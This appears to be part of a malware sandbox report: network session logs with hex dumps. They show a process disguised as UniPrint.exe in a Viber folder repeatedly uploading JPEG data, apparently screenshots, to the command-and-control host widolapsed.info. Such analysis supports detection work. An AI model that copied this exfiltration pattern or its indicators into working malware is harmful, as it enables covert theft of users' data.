                                                                                                      2021-09-15 11:46:40 UTC2634OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 fc d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:40 UTC2634OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:40 UTC2650OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:40 UTC2666OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:40 UTC2682OUTData Raw: 70 2f fa ab 58 c7 d6 8f 69 51 ed 10 f6 14 d6 f2 2a 2d a4 ed d2 33 f9 55 bb 4d 36 e3 cd 0c 50 f5 a8 db 5d ba 3f 74 22 fd 05 31 35 5b c7 91 73 29 c1 3d 85 4c 95 66 8d 29 aa 11 92 dd 97 3c 66 bb 61 b5 07 d2 b9 7d 3f fe 42 36 ff 00 f5 d1 6b a6 f1 89 2d 6d 68 4f 52 b5 cc e9 ff 00 f2 11 b7 ff 00 ae 83 f9 d2 c3 ff 00 00 eb ad fc 63 d0 b5 14 b7 33 06 9a 50 a7 1d 2a 91 9b 4d 8f ab 93 55 bc 48 48 bd 5c 1f e1 ac 5e bd eb 0a 14 39 a0 9b 64 e2 71 9c 95 1c 54 4e 80 ea 7a 7a 7d c8 89 a6 1d 72 25 ff 00 57 6e 2b 0a 8a dd 61 61 d4 e4 78 fa bd 0d 86 d7 e6 fe 08 d4 54 0f ac dd b7 46 c7 d2 b3 a8 aa 58 7a 6b a1 93 c5 d6 7d 4b 6d a8 5c bf de 95 bf 3a 6f 9d 23 75 72 7f 1a af 4e 5a bf 67 15 b2 25 56 9b dd 92 ee 27 a9 34 b9 a6 8a 5a 56 2d 49 b1 d4 e1 4d cd 2e 69 16 98 ec d3 81 a8
                                                                                                      Data Ascii: p/XiQ*-3UM6P]?t"15[s)=Lf)<fa}?B6k-mhORc3P*MUHH\^9dqTNzz}r%Wn+aaxTFXzk}Km\:o#urNZg%V'4ZV-IM.i
                                                                                                      2021-09-15 11:46:40 UTC2698OUTData Raw: 0b 9a 29 28 a0 05 a2 92 8a 00 5a 28 a2 80 16 8a 4a 5a 62 0a 5a 4a 29 80 51 45 14 80 28 a2 8a 00 28 a2 8a 00 29 69 28 a0 05 a2 92 96 98 05 14 51 40 85 a2 92 8a 00 5a 29 28 a0 05 a2 92 8a 00 5a 28 a2 80 0a 28 a2 98 85 a4 a2 8a 00 5a 28 a2 80 0a 28 a2 80 0a 28 a2 80 16 8a 41 4b 4c 41 4b 49 46 68 01 68 a4 cd 14 00 b4 66 92 8a 00 5c d1 49 4b 40 82 8a 28 a0 02 96 92 96 98 05 2d 25 14 00 bd e8 a2 8a 00 28 a4 a5 a6 02 d1 49 45 02 16 8a 4a 5a 00 5a 29 28 a6 21 68 a2 8a 00 5a 4a 33 45 00 2d 14 51 40 05 2d 25 14 00 b4 0a 4a 5a 62 16 8c d2 51 4c 42 e6 8c d2 51 40 0e cd 14 da 5a 2e 16 16 8c d2 66 93 34 5c 2c 3b 34 66 9b 9a 28 b8 58 7e 68 cd 36 8c d3 b8 ac 3b 34 99 a6 d2 e6 95 c7 61 73 4b 9a 6d 26 68 b8 58 75 19 a4 cd 14 5c 2c 3b 34 86 92 8c d3 b8 58 28 a4 a2 90 0b 46
                                                                                                      Data Ascii: )(Z(JZbZJ)QE(()i(Q@Z)(Z((Z(((AKLAKIFhhf\IK@(-%(IEJZZ)(!hZJ3E-Q@-%JZbQLBQ@Z.f4\,;4f(X~h6;4asKm&hXu\,;4X(F
                                                                                                      2021-09-15 11:46:40 UTC2709OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 30 31 30 37 37 33 32 36 32 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------4010773262--
                                                                                                      2021-09-15 11:46:42 UTC2709INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:40 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=103ccd40d7a4cb1c8b51842a66271d7b87675ab989464d8895780fd21c08c222; expires=Thu, 15-Sep-2022 11:46:40 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:42 UTC2709INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      35192.168.2.34982645.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:43 UTC2709OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76597
                                                                                                      Content-Type: multipart/form-data; boundary=--------1730318477
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:43 UTC2710OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 37 33 30 33 31 38 34 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1730318477Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:43 UTC2710OUTData Raw: 7f 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 e7 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee 98 ef 4d 77 7d 78 7d 40 d3 6d 60 3b ea 5f 32 bb b0
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[DMw}x}@m`;_2
                                                                                                      2021-09-15 11:46:43 UTC2710OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:43 UTC2726OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:43 UTC2742OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:43 UTC2758OUTData Raw: 58 bd 7b d6 14 28 73 41 36 c9 c4 e3 39 2a 38 a8 9d 01 d4 f4 f4 fb 91 13 4c 3a e4 4b fe ae dc 56 15 15 ba c2 c3 a9 c8 f1 f5 7a 1b 0d af cd fc 11 a8 a8 1f 59 bb 6e 8d 8f a5 67 51 54 b0 f4 d7 43 27 8b ac fa 96 db 50 b9 7f bd 2b 7e 74 df 3a 46 ea e4 fe 35 5e 9c b5 7e ce 2b 64 4a ad 37 bb 25 dc 4f 52 69 73 4d 14 b4 ac 5a 93 63 a9 c2 9b 9a 5c d2 2d 31 d9 a7 03 51 d3 c5 26 8a 4c 7d 28 a6 8a 5a 93 44 c7 53 85 30 1a 76 45 22 93 1d 9a 70 a6 66 97 26 a5 a2 d3 24 a2 9a 09 a5 fa 9a 4d 14 98 f1 4b 91 51 ef 41 d5 87 e7 4c 6b 98 13 ab 83 4b 95 87 3a 5d 4b 20 fc a7 e9 5c 67 8a 3f e3 f6 2f fa e4 2b a6 3a 94 0b 90 32 6b 99 f1 29 cd dc 27 fe 99 0f e7 55 18 b5 b8 29 a9 4b 43 8b a2 8a dc bc 29 0f 85 f4 e3 1c ba 7c 6f 34 2e 5e 37 b5 0d 34 a7 cd 61 90 fb 0e 30 07 f7 87 4a e0 6e
                                                                                                      Data Ascii: X{(sA69*8L:KVzYngQTC'P+~t:F5^~+dJ7%ORisMZc\-1Q&L}(ZDS0vE"pf&$MKQALkK:]K \g?/+:2k)'U)KC)|o4.^74a0Jn
                                                                                                      2021-09-15 11:46:43 UTC2774OUTData Raw: 28 01 28 a2 8a 00 28 a2 8a 00 5a 29 28 a0 05 a5 a6 d2 d0 21 69 28 a2 80 17 34 52 51 40 0b 45 25 14 00 b4 51 45 00 2d 14 94 b4 c4 14 b4 94 53 00 a2 8a 29 00 51 45 14 00 51 45 14 00 52 d2 51 40 0b 45 25 2d 30 0a 28 a2 81 0b 45 25 14 00 b4 52 51 40 0b 45 25 14 00 b4 51 45 00 14 51 45 31 0b 49 45 14 00 b4 51 45 00 14 51 45 00 14 51 45 00 2d 14 82 96 98 82 96 92 8c d0 02 d1 49 9a 28 01 68 cd 25 14 00 b9 a2 92 96 81 05 14 51 40 05 2d 25 2d 30 0a 5a 4a 28 01 7b d1 45 14 00 51 49 4b 4c 05 a2 92 8a 04 2d 14 94 b4 00 b4 52 51 4c 42 d1 45 14 00 b4 94 66 8a 00 5a 28 a2 80 0a 5a 4a 28 01 68 14 94 b4 c4 2d 19 a4 a2 98 85 cd 19 a4 a2 80 1d 9a 29 b4 b4 5c 2c 2d 19 a4 cd 26 68 b8 58 76 68 cd 37 34 51 70 b0 fc d1 9a 6d 19 a7 71 58 76 69 33 4d a5 cd 2b 8e c2 e6 97 34 da 4c
                                                                                                      Data Ascii: (((Z)(!i(4RQ@E%QE-S)QEQERQ@E%-0(E%RQ@E%QEQE1IEQEQEQE-I(h%Q@-%-0ZJ({EQIKL-RQLBEfZ(ZJ(h-)\,-&hXvh74QpmqXvi3M+4L
                                                                                                      2021-09-15 11:46:43 UTC2784OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 37 33 30 33 31 38 34 37 37 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1730318477--
                                                                                                      2021-09-15 11:46:44 UTC2784INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:43 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=e5f0bc01e65adfb878ebf44a9d0fad746c2406c9782b10156b0abc72510e5b10; expires=Thu, 15-Sep-2022 11:46:43 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:44 UTC2785INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      36192.168.2.34982745.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:45 UTC2785OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76649
                                                                                                      Content-Type: multipart/form-data; boundary=--------2667398164
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:45 UTC2785OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 36 36 37 33 39 38 31 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2667398164Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:45 UTC2785OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 91 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:45 UTC2785OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:45 UTC2801OUTData Raw: b2 45 35 e3 1a f7 fc 8c 1a 97 fd 7d 4b ff 00 a1 9a f6 65 35 e3 3a f7 fc 8c 1a 97 fd 7d 4b ff 00 a1 9a f4 32 cf 8a 47 2e 2f 64 50 a5 a4 a5 af 64 e2 0a 31 45 14 08 31 5e 9f f0 a7 8d 26 fb fe bb 8f fd 06 bc c2 bd 3b e1 57 fc 82 6f bf eb b8 ff 00 d0 6b 3a bf 09 a5 3f 88 ee a9 2b 26 c6 d6 07 d2 6d ae 6e 67 ba cb 40 b2 48 e6 ee 50 3e e8 24 fd ea b2 96 16 b2 46 af 1c d7 4c ac 32 08 bc 97 04 7f df 55 8b 8c 53 df f0 ff 00 82 68 a5 26 b6 fc 7f e0 15 35 48 2d 6e d2 ea d2 f6 09 24 8e 56 07 88 99 bf 85 46 41 03 af 15 e4 3a fe 97 fd 91 aa 3d a8 72 e9 8d c8 59 4a 9c 1f 50 7b d7 b2 4b 6c b6 b7 96 26 19 2e 3e 79 8a b0 7b 87 70 47 96 e7 a1 24 75 02 bc d7 e2 47 fc 8d 6f ff 00 5c 53 f9 55 c1 59 e9 d4 99 bb ad 7a 1c 9d 25 3b 02 93 15 b5 8c 84 a2 97 14 60 d0 01 de 8a 39 a2 80
                                                                                                      Data Ascii: E5}Ke5:}K2G./dPd1E1^&;Wok:?+&mng@HP>$FL2USh&5H-n$VFA:=rYJP{Kl&.>y{pG$uGo\SUYz%;`9
                                                                                                      2021-09-15 11:46:45 UTC2817OUTData Raw: a4 a2 8a d4 c4 5a 29 29 68 00 a2 8a 28 10 b4 52 52 d2 00 a2 8a 28 10 52 d2 52 d2 00 a5 a4 a5 14 08 51 4b 49 4b 48 42 d5 88 1b a0 aa d5 35 bf de a8 96 c6 94 9d a4 6b ea c7 1e 1a 1e ed 5c 4b f5 ae cf 59 e3 c3 49 fe f5 71 6e 79 ac 70 bf 03 f5 3d 4a ff 00 1a f4 3b d1 c7 87 6c be 82 a8 e6 ae b7 1e 1f b1 1f ec 8f e5 54 6b 9e 8f 5f 53 4c 43 f7 97 a0 b9 a3 34 94 95 b1 cf 71 d9 a5 0d 4d 14 51 60 4c 7e 4d 3b 71 f5 a6 0a 5a 96 8b 4d 92 06 34 e0 c6 a2 14 ec d4 b4 52 93 25 0e 7d 69 c2 66 1d 18 d4 20 d2 d4 b8 a2 d4 d9 69 6e 64 1f c4 6a 55 bc 71 d7 06 a9 03 4e cd 43 a7 13 45 56 45 f1 79 fd e5 06 97 cf 85 be f4 62 a8 66 94 31 a9 74 91 6a ab 2f 6d b4 7e a9 8a 4f b1 da 37 43 8a aa 18 d3 83 1a 9e 56 b6 65 29 c5 ee 89 4e 99 19 fb af 4c 6d 2d bf 85 c1 a0 39 ec 4d 48 26 71 fc
                                                                                                      Data Ascii: Z))h(RR(RRQKIKHB5k\KYIqnyp=J;lTk_SLC4qMQ`L~M;qZM4R%}if indjUqNCEVEybf1tj/m~O7CVe)NLm-9MH&q
                                                                                                      2021-09-15 11:46:45 UTC2833OUTData Raw: 0c fa b4 8c 9c 53 c4 6e 78 0a 4f e1 5a 27 52 d3 e3 ff 00 57 6a 4f d6 90 eb 81 7f d5 5a c6 3e b4 7b 4a 8f 68 87 b0 a6 b7 91 51 6d 27 6e 91 9f ca ad da 69 b7 1e 68 62 87 ad 46 da ed d1 fb a1 17 e8 29 89 aa de 3c 8b 99 4e 09 ec 2a 64 ab 34 69 4d 50 8c 96 ec b9 e3 35 db 0d a8 3e 95 cb e9 ff 00 f2 11 b7 ff 00 ae 8b 5d 37 8c 49 6b 6b 42 7a 95 ae 67 4f ff 00 90 8d bf fd 74 1f ce 96 1f f8 07 5d 6f e3 1e 85 a8 a5 b9 98 34 d2 85 38 e9 54 8c da 6c 7d 5c 9a ad e2 42 45 ea e0 ff 00 0d 62 f5 ef 58 50 a1 cd 04 db 27 13 8c e4 a8 e2 a2 74 07 53 d3 d3 ee 44 4d 30 eb 91 2f fa bb 71 58 54 56 eb 0b 0e a7 23 c7 d5 e8 6c 36 bf 37 f0 46 a2 a0 7d 66 ed ba 36 3e 95 9d 45 52 c3 d3 5d 0c 9e 2e b3 ea 5b 6d 42 e5 fe f4 ad f9 d3 7c e9 1b ab 93 f8 d5 7a 72 d5 fb 38 ad 91 2a b4 de ec 97
                                                                                                      Data Ascii: SnxOZ'RWjOZ>{JhQm'nihbF)<N*d4iMP5>]7IkkBzgOt]o48Tl}\BEbXP'tSDM0/qXTV#l67F}f6>ER].[mB|zr8*
